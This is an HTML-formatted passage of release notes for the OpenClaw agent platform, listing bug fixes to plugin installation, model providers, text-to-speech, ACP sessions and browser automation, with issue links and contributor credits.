<li>Plugins/doctor: read bundled channel doctor capabilities through the same packaged plugin directory resolver used by plugin loading, so published installs keep Matrix DM allowlist repairs on <code>channels.matrix.dm.*</code> instead of writing invalid top-level <code>dmPolicy</code> keys. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329162302" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71757" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71757/hovercard" href="https://github.com/openclaw/openclaw/issues/71757">#71757</a>.</li>
<li>Plugins/Windows: keep bundled plugin Jiti loaders off the native import path on Windows so channel plugins such as Telegram no longer crash with <code>ERR_UNSUPPORTED_ESM_URL_SCHEME</code> on <code>C:\...</code> paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329134759" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71749" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71749/hovercard" href="https://github.com/openclaw/openclaw/issues/71749">#71749</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/smeyer9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/smeyer9">@smeyer9</a>.</li>
<li>Providers/Ollama: use Ollama's current <code>/api/web_search</code> endpoint and honor <code>https://ollama.com</code> model-provider base URLs for Ollama Web Search. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329095399" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71741" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71741/hovercard" href="https://github.com/openclaw/openclaw/issues/71741">#71741</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/madhvidua/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/madhvidua">@madhvidua</a>.</li>
<li>Memory/Ollama: serialize Ollama memory embedding batches and add an inline batch timeout override, with longer defaults for local/self-hosted embedding providers.</li>
<li>Sessions/usage: exclude compaction checkpoint transcript snapshots from usage totals and session discovery, while keeping old checkpoint files removable.</li>
<li>CLI/agents: keep <code>openclaw agents list --json</code> on the config-only path by default, avoiding bundled plugin loading unless callers request <code>--bindings</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329088196" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71739" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71739/hovercard" href="https://github.com/openclaw/openclaw/issues/71739">#71739</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kaloster/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kaloster">@kaloster</a>.</li>
<li>Plugins/install: force plugin dependency installs to stay project-local even when inherited npm config requests global installs, so successful installs still materialize the plugin's staged <code>node_modules</code>.</li>
<li>Providers/Google: transcode Gemini TTS PCM to Opus for voice-note targets so WhatsApp and other native voice-note replies can play as voice messages.</li>
<li>TTS/WhatsApp: mark non-Opus provider output as voice-note intent so channel delivery transcodes MP3/WebM replies to Ogg/Opus PTT audio.</li>
<li>Plugins/runtime deps: reuse existing external bundled-plugin stage roots when mirrored plugin roots are inspected again, avoiding second-generation <code>openclaw-unknown-*</code> stages and repeated first-turn restaging. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328214258" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71599" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71599/hovercard" href="https://github.com/openclaw/openclaw/issues/71599">#71599</a>.</li>
<li>iOS/macOS Talk Mode: allow <code>talk.speechLocale</code> to set the speech recognition locale for non-English voice conversations. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4069022882" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44688" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44688/hovercard" href="https://github.com/openclaw/openclaw/issues/44688">#44688</a>.</li>
<li>Plugins/providers: honor explicit plugin candidate lists instead of reading a persisted registry snapshot from local state, keeping candidate-scoped provider discovery hermetic.</li>
<li>Plugins/doctor: keep bundled plugin runtime-dependency repairs inside the managed OpenClaw stage even when user npm prefix/global config points npm at <code>$HOME/node_modules</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329067622" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71730" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71730/hovercard" href="https://github.com/openclaw/openclaw/issues/71730">#71730</a>.</li>
<li>ACP/sessions_spawn: reject normal OpenClaw config agent ids when callers explicitly request <code>runtime="acp"</code>, while allowing agents configured with <code>runtime.type="acp"</code> to resolve to their ACP harness id. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4234724919" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63914" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63914/hovercard" href="https://github.com/openclaw/openclaw/issues/63914">#63914</a>.</li>
<li>ACP/sessions_spawn: apply <code>runTimeoutSeconds</code> to ACP child turns and dispatch those turns on the background subagent lane, so quota-stalled ACP harnesses do not occupy the main agent lane indefinitely. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289936854" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68823" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68823/hovercard" href="https://github.com/openclaw/openclaw/issues/68823">#68823</a>.</li>
<li>ACP/oneshot: reconcile runtime session identity before closing completed oneshot ACP runs, so finished <code>sessions.json</code> entries do not stay stuck with <code>acp.identity.state="pending"</code>.</li>
<li>ACPX: bundle <code>acpx@0.6.1</code> so unsupported generic model overrides fail clearly instead of silently falling back to the target adapter default.</li>
<li>ACP/models: document that non-Codex ACP model overrides require adapter support for ACP <code>models</code> plus <code>session/set_model</code>, so unsupported harnesses fail clearly instead of silently falling back to their defaults.</li>
<li>Plugins/Voice Call: treat missing provider credentials as setup-incomplete during Gateway startup and log the missing keys as a warning instead of a runtime startup error, while keeping explicit command/tool errors when used.</li>
<li>Android/Talk Mode: prevent duplicate TTS playback when fast or repeated final chat events arrive while Talk Mode is waiting for its own response. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4076624751" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46546" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/46546/hovercard" href="https://github.com/openclaw/openclaw/issues/46546">#46546</a>.</li>
<li>Tooling/check:changed: pass parent heavy-check lock markers to lint lanes so <code>pnpm check:changed</code> no longer waits on its own <code>lint:extensions</code> child.</li>
<li>CLI/completion: dedupe provider auth flags before registering <code>openclaw onboard</code> options, so completion-cache refresh during update no longer fails when stale core fallback flags overlap plugin manifest flags. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328717666" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71667" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71667/hovercard" href="https://github.com/openclaw/openclaw/issues/71667">#71667</a>.</li>
<li>Diagnostics/trace: report live context usage from the current prompt snapshot instead of provider turn totals, avoiding false near-full context spikes on cached or tool-heavy runs.</li>
<li>Providers/Google: honor <code>models.providers.google.request.allowPrivateNetwork</code> for Gemini TTS and telephony TTS, matching Google image generation and media understanding. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329016945" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71723" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71723/hovercard" href="https://github.com/openclaw/openclaw/pull/71723">#71723</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ro-hansolo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ro-hansolo">@ro-hansolo</a>.</li>
<li>Providers/MiniMax: register <code>minimax-portal</code> for music and video generation, preserving OAuth auth and regional MiniMax base URLs across the shared <code>music_generate</code> and <code>video_generate</code> tools. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226014254" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63241" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63241/hovercard" href="https://github.com/openclaw/openclaw/pull/63241">#63241</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tars90percent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tars90percent">@tars90percent</a>.</li>
<li>Providers/onboarding: keep Runway and Alibaba Model Studio out of the text-inference setup picker by scoping their video-generation auth choices to the media setup flow. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4253432057" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65856" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65856/hovercard" href="https://github.com/openclaw/openclaw/pull/65856">#65856</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jah-yee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jah-yee">@Jah-yee</a>.</li>
<li>Plugins/Bonjour: stop the gateway from crash-looping on <code>CIAO PROBING CANCELLED</code> when the mDNS watchdog cancels a stuck probe. Restores the rejection-handler wiring dropped during the bonjour plugin migration and shares unhandled-rejection state across module instances so plugin-staged copies of <code>openclaw/plugin-sdk/runtime</code> register into the same handler set the host consults. Especially affects Docker on macOS, where mDNS probing reliably hits the watchdog. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/troyhitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/troyhitch">@troyhitch</a>.</li>
<li>Google Meet: report pinned Chrome nodes as offline or missing capabilities in setup/join diagnostics, keep inaccessible nodes out of auto-selection, and preflight local BlackHole/SoX requirements before agents try local Chrome.</li>
<li>Providers/MiniMax: route <code>image-01</code> requests to the dedicated image generation endpoint while preserving CN endpoint selection. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206267950" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61149" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61149/hovercard" href="https://github.com/openclaw/openclaw/issues/61149">#61149</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mushuiyu886/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mushuiyu886">@mushuiyu886</a>.</li>
<li>Plugins/startup: remove ownerless bundled runtime-dependency install locks after a short grace window and include lock owner details when startup times out waiting for a plugin runtime-deps lock.</li>
<li>Plugins/install: anchor bundled runtime-dependency npm installs with an OpenClaw-owned package manifest so Linux updates cannot accidentally write to a parent <code>$HOME/node_modules</code> tree. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329067622" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71730" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71730/hovercard" href="https://github.com/openclaw/openclaw/issues/71730">#71730</a>.</li>
<li>Plugins/install: pass onboarding plugin config into plugin index writes so local plugin installs outside default discovery roots keep their install records. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/install: migrate shipped <code>plugins.installs</code> config records into the plugin index while stripping them from runtime config and future writes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/install: durably remove shipped <code>plugins.installs</code> from <code>openclaw.json</code> after its records are copied into the plugin index, while rolling back the index write if config cleanup fails. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/install: keep migrated plugin install records in the plugin index even when the plugin manifest is missing or invalid, so update, uninstall, inspect, and audit can still recover broken installs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/security: keep plugin audit JSON check ids stable while reporting plugin index install-record findings with updated wording. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/config: reject direct <code>plugins.installs</code> edits with guidance to use <code>openclaw plugins install</code>, <code>openclaw plugins update</code>, or <code>openclaw plugins uninstall</code> instead. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Live tests/voice: accept common STT variants for OpenClaw and ElevenLabs brand names so provider smoke tests fail on real regressions rather than equivalent transcripts.</li>
<li>Agents/replies: forward sanitized underlying agent failure details on external channels instead of replacing unknown failures with a generic retry message.</li>
<li>CLI/MCP: translate OpenClaw <code>mcp.servers.*.transport</code> entries into Claude/Gemini CLI <code>type</code> fields so streamable HTTP MCP servers load in CLI backend sessions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329018159" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71724" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71724/hovercard" href="https://github.com/openclaw/openclaw/pull/71724">#71724</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Blockchain-Oracle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Blockchain-Oracle">@Blockchain-Oracle</a>.</li>
<li>Browser/CDP: honor configured remote and <code>attachOnly</code> CDP HTTP/WebSocket timeouts when opening tabs through raw CDP or <code>/json/new</code> fallback. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4132440350" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54238" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54238/hovercard" href="https://github.com/openclaw/openclaw/pull/54238">#54238</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/FuncWei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/FuncWei">@FuncWei</a>.</li>
<li>WhatsApp/TTS: send visible text separately from PTT voice-note audio instead of relying on hidden voice-note captions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4108175128" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51081" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51081/hovercard" href="https://github.com/openclaw/openclaw/issues/51081">#51081</a>.</li>
<li>Browser/client: avoid telling agents to restart OpenClaw for dispatcher timeouts on external browser profiles such as <code>attachOnly</code>, remote CDP, and existing-session. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4044411472" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40815" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/40815/hovercard" href="https://github.com/openclaw/openclaw/pull/40815">#40815</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xsline/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xsline">@0xsline</a>.</li>
<li>Agents/TTS: preserve <code>[[audio_as_voice]]</code> directives on trusted text tool-result <code>MEDIA:</code> payloads so generated audio still delivers as a voice note. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4076576982" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46535" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/46535/hovercard" href="https://github.com/openclaw/openclaw/pull/46535">#46535</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/azade-c/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/azade-c">@azade-c</a>.</li>
<li>Agents/TTS: keep queued tool media when an assistant ends with <code>NO_REPLY</code> on non-block delivery paths, so media-only generated audio replies still send. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4198016737" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60025" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60025/hovercard" href="https://github.com/openclaw/openclaw/pull/60025">#60025</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bradlind1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bradlind1">@bradlind1</a>.</li>
<li>Telegram/STT: frame inbound voice-note transcripts as machine-generated, untrusted text in agent context while preserving raw transcript mention detection. Closes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4018090172" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/33360" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/33360/hovercard" href="https://github.com/openclaw/openclaw/issues/33360">#33360</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/smartchainark/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/smartchainark">@smartchainark</a>.</li>
<li>Subagents/browser: show an actionable <code>/tools</code> notice when browser automation is configured but filtered out by the active tool profile, and document that coding-profile agents should use <code>tools.alsoAllow: ["browser"]</code> rather than subagent allowlists alone.</li>
<li>Control UI/Quick Settings: persist the assistant avatar override to browser local storage (mirroring the user avatar) so uploaded image data URLs no longer fail config validation with "Too big: expected string to have &lt;=200 characters". Also lift the gateway-side <code>ui.assistant.avatar</code> length cap to match the user avatar size budget for non-UI clients writing the field directly. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Plugin SDK: share diagnostic event subscriptions across duplicate source/dist module graphs so legacy root SDK imports still receive runtime diagnostic events.</li>
<li>Agents/Bedrock: prevent empty assistant stream-error turns from poisoning Converse replay by persisting, repairing, and replaying a non-empty fallback block. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328056829" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71572" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71572/hovercard" href="https://github.com/openclaw/openclaw/issues/71572">#71572</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328448230" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71627" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71627/hovercard" href="https://github.com/openclaw/openclaw/pull/71627">#71627</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a>.</li>
<li>Agents/Anthropic/Bedrock: strip thinking blocks with missing, empty, or blank replay signatures before provider conversion, falling back to non-empty omitted-reasoning text when needed so corrupted signed-thinking history no longer poisons subsequent turns. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4070310932" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45010" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45010/hovercard" href="https://github.com/openclaw/openclaw/issues/45010">#45010</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4307495974" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70054" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70054/hovercard" href="https://github.com/openclaw/openclaw/pull/70054">#70054</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/castaples/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/castaples">@castaples</a>.</li>
<li>Agents/Anthropic/Bedrock: preserve stripped thinking-only assistant replay turns with non-empty omitted-reasoning text so provider adapters keep strict user/assistant turn shape. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wujiaming88/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wujiaming88">@wujiaming88</a>.</li>
<li>ACP/Codex: pass <code>sessions_spawn(runtime="acp")</code> model and thinking overrides into Codex ACP startup, normalize <code>openai-codex/*</code> refs and slash reasoning suffixes, and recognize managed Codex ACP wrapper commands without blocking current <code>gpt-5.5</code> sessions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4042597081" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40393" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40393/hovercard" href="https://github.com/openclaw/openclaw/issues/40393">#40393</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328579948" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71643" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71643/hovercard" href="https://github.com/openclaw/openclaw/pull/71643">#71643</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/91wan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/91wan">@91wan</a>.</li>
<li>Browser/CDP: make readiness diagnostics use the same discovery-first fallback as reachability for bare <code>ws://</code> Browserless and Browserbase CDP URLs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4299797320" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69532" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69532/hovercard" href="https://github.com/openclaw/openclaw/issues/69532">#69532</a>.</li>
<li>Browser/CDP: explain that loopback Browserless or other externally managed CDP services need <code>attachOnly: true</code> and matching Browserless <code>EXTERNAL</code> endpoint when reporting local port ownership conflicts, and fall back to the configured bare WebSocket root when a discovered Browserless endpoint rejects CDP. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4095070385" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49815" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49815/hovercard" href="https://github.com/openclaw/openclaw/issues/49815">#49815</a>.</li>
<li>Gateway/reload: preserve indefinite <code>gateway.reload.deferralTimeoutMs: 0</code> semantics for channel hot reload deferrals so active agent runs are not interrupted by a forced channel restart. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328540681" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71637" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71637/hovercard" href="https://github.com/openclaw/openclaw/pull/71637">#71637</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Poo-Squirry/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Poo-Squirry">@Poo-Squirry</a>.</li>
<li>Agents/tool results: cap persisted Pi tool-result details and strip hidden diagnostics before provider conversion, preventing large debug payloads from bloating session transcripts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328540681" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71637" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71637/hovercard" href="https://github.com/openclaw/openclaw/pull/71637">#71637</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Poo-Squirry/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Poo-Squirry">@Poo-Squirry</a>.</li>
<li>ACP/OpenCode: update the bundled acpx runtime to 0.6.0 and cover the OpenCode ACP bind path in Docker live tests.</li>
<li>Providers/OpenCode Go: add DeepSeek V4 Pro and DeepSeek V4 Flash to the Go catalog while the bundled Pi registry catches up. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328161792" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71587" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71587/hovercard" href="https://github.com/openclaw/openclaw/issues/71587">#71587</a>.</li>
<li>Providers/OpenCode Go: route DeepSeek V4 Pro/Flash through the OpenAI-compatible Go endpoint and suppress invalid <code>reasoning_effort: "off"</code> payloads, fixing tool-enabled requests for <code>opencode-go/deepseek-v4-flash</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328769808" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71683" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71683/hovercard" href="https://github.com/openclaw/openclaw/issues/71683">#71683</a>.</li>
<li>Plugins/model defaults: run Skill Workshop review, Active Memory recall, and session-memory slug generation on the configured agent default model instead of the hardcoded OpenAI SDK fallback when hook context lacks model metadata. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328679241" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71659" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71659/hovercard" href="https://github.com/openclaw/openclaw/issues/71659">#71659</a>.</li>
<li>Providers/Venice: fill the required DeepSeek V4 <code>reasoning_content</code> placeholder for <code>venice/deepseek-v4-pro</code> and <code>venice/deepseek-v4-flash</code> replay turns without sending native DeepSeek <code>thinking</code> controls that Venice rejects. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328450187" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71628" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71628/hovercard" href="https://github.com/openclaw/openclaw/issues/71628">#71628</a>.</li>
<li>Browser/existing-session: support per-profile Chrome MCP command/args, map <code>cdpUrl</code> to <code>--browserUrl</code> or <code>--wsEndpoint</code>, and avoid combining endpoint flags with <code>--userDataDir</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4080120284" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47879" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47879/hovercard" href="https://github.com/openclaw/openclaw/issues/47879">#47879</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4080995803" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48037" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48037/hovercard" href="https://github.com/openclaw/openclaw/issues/48037">#48037</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4220547110" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62706" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62706/hovercard" href="https://github.com/openclaw/openclaw/issues/62706">#62706</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/puneet1409/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/puneet1409">@puneet1409</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhehao/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhehao">@zhehao</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/madkow1001/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/madkow1001">@madkow1001</a>.</li>
<li>Media/plugins: bound MIME sniffing and ZIP archive preflight before handing untrusted files to <code>file-type</code> or <code>jszip</code>, reducing parser CPU and memory exposure for attachments and ClawHub plugin archives. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
